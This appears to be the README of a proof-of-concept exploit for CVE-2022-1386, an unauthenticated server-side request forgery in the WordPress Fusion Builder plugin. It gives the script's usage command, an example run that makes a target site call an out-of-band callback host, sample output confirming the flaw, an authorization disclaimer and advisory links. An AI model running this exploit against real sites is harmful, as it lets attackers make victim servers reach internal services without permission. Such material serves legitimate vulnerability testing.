
Unauthenticated SSRF PoC in WordPress Fusion Builder <3.6.2 (CVE-2022-1386)
Unauthenticated Server-Side Request Forgery (SSRF) in the Fusion Builder plugin (used by the Avada WordPress theme) prior to version 3.6.2.
Allows attackers to make HTTP requests to arbitrary URLs, potentially targeting internal services.
admin-ajax.phppython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
Example:
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
Use Interact.sh or [Burp Collaborator] to receive the callback.
📋 Sample Output
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
📌 Notes This PoC avoids data exfiltration. Ethical usage only: do not exploit systems without authorization.
📚 References https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/